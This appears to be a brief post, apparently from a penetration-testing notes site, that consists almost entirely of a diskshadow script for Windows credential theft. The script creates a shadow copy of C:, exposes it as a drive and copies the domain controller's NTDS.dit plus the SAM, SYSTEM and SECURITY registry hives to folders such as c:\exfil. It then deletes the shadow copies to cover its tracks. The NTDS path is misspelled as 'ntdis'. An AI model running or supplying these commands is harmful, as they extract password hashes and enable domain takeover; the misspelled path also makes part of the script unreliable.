Reading Time: < 1 minute

diskshadow

set context persistent nowriters
add volume c: alias myalias
create
expose %myalias% z:
exec “cmd.exe” /c copy z:\windows\ntdis\ntdis.dit c:\exfil\ntdis.fil (in case of a Domain Controller )

exec “cmd.exe” /c copy z:\windows\System32\config\SAM c:\Temp\sam
exec “cmd.exe” /c copy z:\windows\System32\config\system c:\Temp\system
exec “cmd.exe” /c copy z:\windows\System32\config\security c:\Temp\security
delete shadows volume %myalias%
reset
exit

0